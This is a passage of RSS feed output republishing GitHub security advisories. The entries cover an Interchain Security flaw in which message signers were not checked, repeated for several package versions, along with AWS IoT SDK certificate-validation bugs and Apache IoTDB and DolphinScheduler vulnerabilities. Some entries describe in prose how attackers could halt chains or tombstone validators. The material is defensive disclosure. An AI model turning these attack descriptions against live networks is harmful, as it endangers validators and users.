<li>message validation <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/types/msg.go#L106">https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/types/msg.go#L106</a></li>
<li>message handling <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/keeper/msg_server.go#L52">https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/keeper/msg_server.go#L52</a></li>
</ul>
<h3 id="severity-assessment">Severity assessment</h3>
<p>The severity assessment is based on <a href="https://github.com/interchainio/security/blob/main/resources/CLASSIFICATION_MATRIX.md">this framework</a>. </p>
<p><strong>Potential impact:</strong> Catastrophic </p>
<ul>
<li>By changing consumer keys for 1/3+ of a consumer chain's validator set, any user could cause a consumer chain to halt. Given that the consumer is down, the provider will jail provider validators for consumer downtime, so this exploit would not have impacted the provider directly. Consumer chain halts would need to be addressed by a provider-side patch.</li>
<li>By changing consumer keys on a consumer node, double signing, and submitting evidence back to the provider, any user could tombstone any provider validator. This would cause the provider's active set to change. At scale, this exploit could be applied to all active provider validators and a well-funded attacker could then run their own nodes and take over consensus on the provider and on consumer chains.</li>
</ul>
<p><strong>Likelihood:</strong> Rare</p>
<ul>
<li>The bug was discovered internally. There is no evidence that any external party has identified this vulnerability. </li>
<li>The bug has been live for two weeks with no issues. </li>
<li>All four message types are ones that only validators use, and rarely use in daily operations.</li>
<li>In the Cosmos Hub’s recent history (May - Aug), there has been only one instance of any of these message types, which was performed in accordance with chain rules.</li>
<li>The catastrophic exploits (such as tombstoning the entire validator set of the provider) are also extremely complex. They involve several operations that are not well-understood by many people, and the entire exploit must occur quickly and at-scale to avoid other node operators responding defensively.</li>
</ul>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/cosmos/interchain-security/security/advisories/GHSA-7q74-g774-7x3g">https://github.com/cosmos/interchain-security/security/advisories/GHSA-7q74-g774-7x3g</a></li>
<li><a href="https://github.com/advisories/GHSA-7q74-g774-7x3g">https://github.com/advisories/GHSA-7q74-g774-7x3g</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-7q74-g774-7x3g</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-7q74-g774-7x3g</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/cosmos/interchain-security/v3] Interchain Security: The signers of ICS messages do not need to match the provider address</title>
<description><h3 id="context">Context</h3>
<p>ICS has the following four messages that enable validators on the provider chain to perform different actions:</p>
<ul>
<li><code>MsgOptIn</code> -- adds a validator to the consumer chain’s active set</li>
<li><code>MsgOptOut</code> -- removes a validator from the consumer chain’s active set </li>
<li><code>MsgAssignConsumerKey</code> -- changes the consensus key used for a validator’s operations on a consumer chain</li>
<li><code>MsgSetConsumerCommissionRate</code> -- sets a validator’s consumer-specific commission rate</li>
</ul>
<p>Normally, only the respective validators are allowed to perform these actions. </p>
<h3 id="issue">Issue</h3>
<p>The upgrade to SDK 0.50, introduced a <a href="https://docs.cosmos.network/v0.50/build/building-modules/protobuf-annotations#signer">signer</a> field to these messages. This field is used to authenticate the user sending the message to the system. However, there was no validation on the ICS side to check if the signer matches the provider address. </p>
<p>As a result, any user could opt-in, opt-out, change the commission rate, or change what public key a validator uses on a consumer chain. </p>
<p>For more context, check out the code:</p>
<ul>
<li>proto files <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/proto/interchain_security/ccv/provider/v1/tx.proto#L52">https://github.com/cosmos/interchain-security/blob/v5.1.1/proto/interchain_security/ccv/provider/v1/tx.proto#L52</a></li>
<li>message validation <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/types/msg.go#L106">https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/types/msg.go#L106</a></li>
<li>message handling <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/keeper/msg_server.go#L52">https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/keeper/msg_server.go#L52</a></li>
</ul>
<h3 id="severity-assessment">Severity assessment</h3>
<p>The severity assessment is based on <a href="https://github.com/interchainio/security/blob/main/resources/CLASSIFICATION_MATRIX.md">this framework</a>. </p>
<p><strong>Potential impact:</strong> Catastrophic </p>
<ul>
<li>By changing consumer keys for 1/3+ of a consumer chain's validator set, any user could cause a consumer chain to halt. Given that the consumer is down, the provider will jail provider validators for consumer downtime, so this exploit would not have impacted the provider directly. Consumer chain halts would need to be addressed by a provider-side patch.</li>
<li>By changing consumer keys on a consumer node, double signing, and submitting evidence back to the provider, any user could tombstone any provider validator. This would cause the provider's active set to change. At scale, this exploit could be applied to all active provider validators and a well-funded attacker could then run their own nodes and take over consensus on the provider and on consumer chains.</li>
</ul>
<p><strong>Likelihood:</strong> Rare</p>
<ul>
<li>The bug was discovered internally. There is no evidence that any external party has identified this vulnerability. </li>
<li>The bug has been live for two weeks with no issues. </li>
<li>All four message types are ones that only validators use, and rarely use in daily operations.</li>
<li>In the Cosmos Hub’s recent history (May - Aug), there has been only one instance of any of these message types, which was performed in accordance with chain rules.</li>
<li>The catastrophic exploits (such as tombstoning the entire validator set of the provider) are also extremely complex. They involve several operations that are not well-understood by many people, and the entire exploit must occur quickly and at-scale to avoid other node operators responding defensively.</li>
</ul>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/cosmos/interchain-security/security/advisories/GHSA-7q74-g774-7x3g">https://github.com/cosmos/interchain-security/security/advisories/GHSA-7q74-g774-7x3g</a></li>
<li><a href="https://github.com/advisories/GHSA-7q74-g774-7x3g">https://github.com/advisories/GHSA-7q74-g774-7x3g</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-7q74-g774-7x3g</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-7q74-g774-7x3g</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/cosmos/interchain-security/v2] Interchain Security: The signers of ICS messages do not need to match the provider address</title>
<description><h3 id="context">Context</h3>
<p>ICS has the following four messages that enable validators on the provider chain to perform different actions:</p>
<ul>
<li><code>MsgOptIn</code> -- adds a validator to the consumer chain’s active set</li>
<li><code>MsgOptOut</code> -- removes a validator from the consumer chain’s active set </li>
<li><code>MsgAssignConsumerKey</code> -- changes the consensus key used for a validator’s operations on a consumer chain</li>
<li><code>MsgSetConsumerCommissionRate</code> -- sets a validator’s consumer-specific commission rate</li>
</ul>
<p>Normally, only the respective validators are allowed to perform these actions. </p>
<h3 id="issue">Issue</h3>
<p>The upgrade to SDK 0.50, introduced a <a href="https://docs.cosmos.network/v0.50/build/building-modules/protobuf-annotations#signer">signer</a> field to these messages. This field is used to authenticate the user sending the message to the system. However, there was no validation on the ICS side to check if the signer matches the provider address. </p>
<p>As a result, any user could opt-in, opt-out, change the commission rate, or change what public key a validator uses on a consumer chain. </p>
<p>For more context, check out the code:</p>
<ul>
<li>proto files <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/proto/interchain_security/ccv/provider/v1/tx.proto#L52">https://github.com/cosmos/interchain-security/blob/v5.1.1/proto/interchain_security/ccv/provider/v1/tx.proto#L52</a></li>
<li>message validation <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/types/msg.go#L106">https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/types/msg.go#L106</a></li>
<li>message handling <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/keeper/msg_server.go#L52">https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/keeper/msg_server.go#L52</a></li>
</ul>
<h3 id="severity-assessment">Severity assessment</h3>
<p>The severity assessment is based on <a href="https://github.com/interchainio/security/blob/main/resources/CLASSIFICATION_MATRIX.md">this framework</a>. </p>
<p><strong>Potential impact:</strong> Catastrophic </p>
<ul>
<li>By changing consumer keys for 1/3+ of a consumer chain's validator set, any user could cause a consumer chain to halt. Given that the consumer is down, the provider will jail provider validators for consumer downtime, so this exploit would not have impacted the provider directly. Consumer chain halts would need to be addressed by a provider-side patch.</li>
<li>By changing consumer keys on a consumer node, double signing, and submitting evidence back to the provider, any user could tombstone any provider validator. This would cause the provider's active set to change. At scale, this exploit could be applied to all active provider validators and a well-funded attacker could then run their own nodes and take over consensus on the provider and on consumer chains.</li>
</ul>
<p><strong>Likelihood:</strong> Rare</p>
<ul>
<li>The bug was discovered internally. There is no evidence that any external party has identified this vulnerability. </li>
<li>The bug has been live for two weeks with no issues. </li>
<li>All four message types are ones that only validators use, and rarely use in daily operations.</li>
<li>In the Cosmos Hub’s recent history (May - Aug), there has been only one instance of any of these message types, which was performed in accordance with chain rules.</li>
<li>The catastrophic exploits (such as tombstoning the entire validator set of the provider) are also extremely complex. They involve several operations that are not well-understood by many people, and the entire exploit must occur quickly and at-scale to avoid other node operators responding defensively.</li>
</ul>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/cosmos/interchain-security/security/advisories/GHSA-7q74-g774-7x3g">https://github.com/cosmos/interchain-security/security/advisories/GHSA-7q74-g774-7x3g</a></li>
<li><a href="https://github.com/advisories/GHSA-7q74-g774-7x3g">https://github.com/advisories/GHSA-7q74-g774-7x3g</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-7q74-g774-7x3g</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-7q74-g774-7x3g</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/cosmos/interchain-security] Interchain Security: The signers of ICS messages do not need to match the provider address</title>
<description><h3 id="context">Context</h3>
<p>ICS has the following four messages that enable validators on the provider chain to perform different actions:</p>
<ul>
<li><code>MsgOptIn</code> -- adds a validator to the consumer chain’s active set</li>
<li><code>MsgOptOut</code> -- removes a validator from the consumer chain’s active set </li>
<li><code>MsgAssignConsumerKey</code> -- changes the consensus key used for a validator’s operations on a consumer chain</li>
<li><code>MsgSetConsumerCommissionRate</code> -- sets a validator’s consumer-specific commission rate</li>
</ul>
<p>Normally, only the respective validators are allowed to perform these actions. </p>
<h3 id="issue">Issue</h3>
<p>The upgrade to SDK 0.50, introduced a <a href="https://docs.cosmos.network/v0.50/build/building-modules/protobuf-annotations#signer">signer</a> field to these messages. This field is used to authenticate the user sending the message to the system. However, there was no validation on the ICS side to check if the signer matches the provider address. </p>
<p>As a result, any user could opt-in, opt-out, change the commission rate, or change what public key a validator uses on a consumer chain. </p>
<p>For more context, check out the code:</p>
<ul>
<li>proto files <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/proto/interchain_security/ccv/provider/v1/tx.proto#L52">https://github.com/cosmos/interchain-security/blob/v5.1.1/proto/interchain_security/ccv/provider/v1/tx.proto#L52</a></li>
<li>message validation <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/types/msg.go#L106">https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/types/msg.go#L106</a></li>
<li>message handling <a href="https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/keeper/msg_server.go#L52">https://github.com/cosmos/interchain-security/blob/v5.1.1/x/ccv/provider/keeper/msg_server.go#L52</a></li>
</ul>
<h3 id="severity-assessment">Severity assessment</h3>
<p>The severity assessment is based on <a href="https://github.com/interchainio/security/blob/main/resources/CLASSIFICATION_MATRIX.md">this framework</a>. </p>
<p><strong>Potential impact:</strong> Catastrophic </p>
<ul>
... |
http://localhost:1200/github-advisor/data/maven - Success ✔️<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">
<channel>
<title>GitHub Advisory Database RSS - maven</title>
<link>https://github.com/advisories</link>
<atom:link href="http://localhost:1200/github-advisor/data/maven" rel="self" type="application/rss+xml"></atom:link>
<description>GitHub Advisory Database RSS - maven - Powered by RSSHub</description>
<generator>RSSHub</generator>
<webMaster>contact@rsshub.app (RSSHub)</webMaster>
<language>en</language>
<lastBuildDate>Fri, 13 Sep 2024 16:19:17 GMT</lastBuildDate>
<ttl>5</ttl>
<item>
<title>[software.amazon.awssdk.iotdevicesdk:aws-iot-device-sdk] Improper certificate management in AWS IoT Device SDK v2</title>
<description><p>Connections initialized by the AWS IoT Device SDK v2 for Java (versions prior to 1.3.3), Python (versions prior to 1.5.18), C++ (versions prior to 1.12.7) and Node.js (versions prior to 1.5.1) did not verify server certificate hostname during TLS handshake when overriding Certificate Authorities (CA) in their trust stores on Windows. This issue has been addressed in aws-c-io submodule versions 0.9.13 onward. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.3.3 on Microsoft Windows. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.5.18 on Microsoft Windows. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.12.7 on Microsoft Windows. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.5.3 on Microsoft Windows.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-40828">https://nvd.nist.gov/vuln/detail/CVE-2021-40828</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2">https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2/commit/4be41394f1aee979e6f4b012fcb01eecabd0c08d">https://github.com/aws/aws-iot-device-sdk-js-v2/commit/4be41394f1aee979e6f4b012fcb01eecabd0c08d</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2/commit/fd4c0ba04b35eab9e20c635af5548fcc5a92d8be">https://github.com/aws/aws-iot-device-sdk-python-v2/commit/fd4c0ba04b35eab9e20c635af5548fcc5a92d8be</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-cpp-v2">https://github.com/aws/aws-iot-device-sdk-cpp-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2">https://github.com/aws/aws-iot-device-sdk-java-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2">https://github.com/aws/aws-iot-device-sdk-js-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2">https://github.com/aws/aws-iot-device-sdk-python-v2</a></li>
<li><a href="https://github.com/advisories/GHSA-94jq-q5v2-76wj">https://github.com/advisories/GHSA-94jq-q5v2-76wj</a></li>
<li><a href="https://github.com/awslabs/aws-c-io">https://github.com/awslabs/aws-c-io</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-861.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-861.yaml</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-94jq-q5v2-76wj</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-94jq-q5v2-76wj</guid>
<author>GitHub</author>
</item>
<item>
<title>[software.amazon.awssdk.iotdevicesdk:aws-iot-device-sdk] Improper certificate management in AWS IoT Device SDK v2</title>
<description><p>The AWS IoT Device SDK v2 for Java, Python, C++ and Node.js appends a user supplied Certificate Authority (CA) to the root CAs instead of overriding it on Unix systems. TLS handshakes will thus succeed if the peer can be verified either from the user-supplied CA or the system’s default trust-store. Attackers with access to a host’s trust stores or are able to compromise a certificate authority already in the host's trust store (note: the attacker must also be able to spoof DNS in this case) may be able to use this issue to bypass CA pinning. An attacker could then spoof the MQTT broker, and either drop traffic and/or respond with the attacker's data, but they would not be able to forward this data on to the MQTT broker because the attacker would still need the user's private keys to authenticate against the MQTT broker. The 'aws_tls_ctx_options_override_default_trust_store_*' function within the aws-c-io submodule has been updated to override the default trust store. This corrects this issue. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.5.0 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.6.1 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.12.7 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.5.3 on Linux/Unix. Amazon Web Services AWS-C-IO 0.10.4 on Linux/Unix.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-40830">https://nvd.nist.gov/vuln/detail/CVE-2021-40830</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2">https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2/commit/53a36e3ac203291494120604d416b6de59177cac">https://github.com/aws/aws-iot-device-sdk-js-v2/commit/53a36e3ac203291494120604d416b6de59177cac</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2/commit/0450ce68add7e3d05c6d781ecdac953c299c053a">https://github.com/aws/aws-iot-device-sdk-python-v2/commit/0450ce68add7e3d05c6d781ecdac953c299c053a</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-cpp-v2">https://github.com/aws/aws-iot-device-sdk-cpp-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2">https://github.com/aws/aws-iot-device-sdk-java-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2">https://github.com/aws/aws-iot-device-sdk-js-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2">https://github.com/aws/aws-iot-device-sdk-python-v2</a></li>
<li><a href="https://github.com/advisories/GHSA-c4rh-4376-gff4">https://github.com/advisories/GHSA-c4rh-4376-gff4</a></li>
<li><a href="https://github.com/awslabs/aws-c-io">https://github.com/awslabs/aws-c-io</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-863.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-863.yaml</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-c4rh-4376-gff4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-c4rh-4376-gff4</guid>
<author>GitHub</author>
</item>
<item>
<title>[software.amazon.awssdk.iotdevicesdk:aws-iot-device-sdk] Improper certificate management in AWS IoT Device SDK v2</title>
<description><p>The AWS IoT Device SDK v2 for Java, Python, C++ and Node.js appends a user supplied Certificate Authority (CA) to the root CAs instead of overriding it on macOS systems. Additionally, SNI validation is also not enabled when the CA has been "overridden". TLS handshakes will thus succeed if the peer can be verified either from the user-supplied CA or the system’s default trust-store. Attackers with access to a host’s trust stores or are able to compromise a certificate authority already in the host's trust store (note: the attacker must also be able to spoof DNS in this case) may be able to use this issue to bypass CA pinning. An attacker could then spoof the MQTT broker, and either drop traffic and/or respond with the attacker's data, but they would not be able to forward this data on to the MQTT broker because the attacker would still need the user's private keys to authenticate against the MQTT broker. The <code>aws_tls_ctx_options_override_default_trust_store_*</code> function within the aws-c-io submodule has been updated to address this behavior. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.5.0 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.7.0 on macOS. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.14.0 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.6.0 on macOS. Amazon Web Services AWS-C-IO 0.10.7 on macOS.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-40831">https://nvd.nist.gov/vuln/detail/CVE-2021-40831</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2/commit/46375e9b1bfb34109b9ff3b1eff9c770f9daa186">https://github.com/aws/aws-iot-device-sdk-java-v2/commit/46375e9b1bfb34109b9ff3b1eff9c770f9daa186</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2/commit/22f1989f5bdb0bdd9c912a5a2d255ee6c0854f68">https://github.com/aws/aws-iot-device-sdk-js-v2/commit/22f1989f5bdb0bdd9c912a5a2d255ee6c0854f68</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2/commit/5aef82573202309063eb540b72cee0e565f85a2d">https://github.com/aws/aws-iot-device-sdk-python-v2/commit/5aef82573202309063eb540b72cee0e565f85a2d</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-cpp-v2">https://github.com/aws/aws-iot-device-sdk-cpp-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2">https://github.com/aws/aws-iot-device-sdk-java-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2">https://github.com/aws/aws-iot-device-sdk-js-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2">https://github.com/aws/aws-iot-device-sdk-python-v2</a></li>
<li><a href="https://github.com/advisories/GHSA-j3f7-7rmc-6wqj">https://github.com/advisories/GHSA-j3f7-7rmc-6wqj</a></li>
<li><a href="https://github.com/awslabs/aws-c-io">https://github.com/awslabs/aws-c-io</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-864.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-864.yaml</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-j3f7-7rmc-6wqj</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-j3f7-7rmc-6wqj</guid>
<author>GitHub</author>
</item>
<item>
<title>[software.amazon.awssdk.iotdevicesdk:aws-iot-device-sdk] Improper certificate management in AWS IoT Device SDK v2</title>
<description><p>Connections initialized by the AWS IoT Device SDK v2 for Java (versions prior to 1.4.2), Python (versions prior to 1.6.1), C++ (versions prior to 1.12.7) and Node.js (versions prior to 1.5.3) did not verify server certificate hostname during TLS handshake when overriding Certificate Authorities (CA) in their trust stores on MacOS. This issue has been addressed in aws-c-io submodule versions 0.10.5 onward. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.4.2 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.6.1 on macOS. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.12.7 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.5.3 on macOS. Amazon Web Services AWS-C-IO 0.10.4 on macOS.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-40829">https://nvd.nist.gov/vuln/detail/CVE-2021-40829</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2/commits/v1.4.2">https://github.com/aws/aws-iot-device-sdk-java-v2/commits/v1.4.2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-cpp-v2">https://github.com/aws/aws-iot-device-sdk-cpp-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2">https://github.com/aws/aws-iot-device-sdk-java-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2">https://github.com/aws/aws-iot-device-sdk-js-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2">https://github.com/aws/aws-iot-device-sdk-python-v2</a></li>
<li><a href="https://github.com/advisories/GHSA-743r-5g92-5vgf">https://github.com/advisories/GHSA-743r-5g92-5vgf</a></li>
<li><a href="https://github.com/awslabs/aws-c-io">https://github.com/awslabs/aws-c-io</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-862.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-862.yaml</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-743r-5g92-5vgf</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-743r-5g92-5vgf</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.apache.iotdb:tsfile] Apache IoTDB subject to ReDOS with Java 8</title>
<description><p>Apache IoTDB versions 0.12.2 through 0.12.6, and 0.13.0 through 0.13.2 are vulnerable to a Denial of Service attack when accepting untrusted patterns for REGEXP queries with Java 8. This issue is patched in 0.13.3. Users should upgrade or use a later version of Java to avoid it.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2022-43766">https://nvd.nist.gov/vuln/detail/CVE-2022-43766</a></li>
<li><a href="https://lists.apache.org/thread/9pgpb82p5brooy41n8l5q0y9h33db2zn">https://lists.apache.org/thread/9pgpb82p5brooy41n8l5q0y9h33db2zn</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/apache-iotdb/PYSEC-2022-42972.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/apache-iotdb/PYSEC-2022-42972.yaml</a></li>
<li><a href="https://github.com/advisories/GHSA-g6hg-4v3c-6jq7">https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.apache.iotdb:iotdb-server] Apache IoTDB subject to ReDOS with Java 8</title>
<description><p>Apache IoTDB versions 0.12.2 through 0.12.6, and 0.13.0 through 0.13.2 are vulnerable to a Denial of Service attack when accepting untrusted patterns for REGEXP queries with Java 8. This issue is patched in 0.13.3. Users should upgrade or use a later version of Java to avoid it.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2022-43766">https://nvd.nist.gov/vuln/detail/CVE-2022-43766</a></li>
<li><a href="https://lists.apache.org/thread/9pgpb82p5brooy41n8l5q0y9h33db2zn">https://lists.apache.org/thread/9pgpb82p5brooy41n8l5q0y9h33db2zn</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/apache-iotdb/PYSEC-2022-42972.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/apache-iotdb/PYSEC-2022-42972.yaml</a></li>
<li><a href="https://github.com/advisories/GHSA-g6hg-4v3c-6jq7">https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.apache.iotdb:flink-tsfile-connector] Apache IoTDB subject to ReDOS with Java 8</title>
<description><p>Apache IoTDB versions 0.12.2 through 0.12.6, and 0.13.0 through 0.13.2 are vulnerable to a Denial of Service attack when accepting untrusted patterns for REGEXP queries with Java 8. This issue is patched in 0.13.3. Users should upgrade or use a later version of Java to avoid it.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2022-43766">https://nvd.nist.gov/vuln/detail/CVE-2022-43766</a></li>
<li><a href="https://lists.apache.org/thread/9pgpb82p5brooy41n8l5q0y9h33db2zn">https://lists.apache.org/thread/9pgpb82p5brooy41n8l5q0y9h33db2zn</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/apache-iotdb/PYSEC-2022-42972.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/apache-iotdb/PYSEC-2022-42972.yaml</a></li>
<li><a href="https://github.com/advisories/GHSA-g6hg-4v3c-6jq7">https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.apache.dolphinscheduler:dolphinscheduler-api] Incorrect Default Permissions in Apache DolphinScheduler</title>
<description><p>Versions of Apache DolphinScheduler prior to 1.3.2 allowed an ordinary user under any tenant to override another users password through the API interface.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-13922">https://nvd.nist.gov/vuln/detail/CVE-2020-13922</a></li>
<li><a href="https://github.com/apache/incubator-dolphinscheduler/commit/b8a9e2e00f2f207ae60c913a7173b59405ff95f1">https://github.com/apache/incubator-dolphinscheduler/commit/b8a9e2e00f2f207ae60c913a7173b59405ff95f1</a></li>
<li><a href="https://www.mail-archive.com/announce@apache.org/msg06076.html">https://www.mail-archive.com/announce@apache.org/msg06076.html</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/apache-dolphinscheduler/PYSEC-2021-876.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/apache-dolphinscheduler/PYSEC-2021-876.yaml</a></li>
<li><a href="https://www.mail-archive.com/announce%40apache.org/msg06076.html">https://www.mail-archive.com/announce%40apache.org/msg06076.html</a></li>
<li><a href="https://github.com/advisories/GHSA-qhh5-9738-g9mx">https://github.com/advisories/GHSA-qhh5-9738-g9mx</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-qhh5-9738-g9mx</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-qhh5-9738-g9mx</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.apache.iotdb:iotdb-grafana-connector] Apache IoTDB Grafana Connector vulnerable to Improper Authentication</title>
<description><p>Improper Authentication vulnerability in Apache Software Foundation Apache IoTDB. This issue affects Apache IoTDB Grafana Connector from 0.13.0 through 0.13.3.</p>
<p>Attackers could log in without authorization. This is fixed in 0.13.4.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-24831">https://nvd.nist.gov/vuln/detail/CVE-2023-24831</a></li>
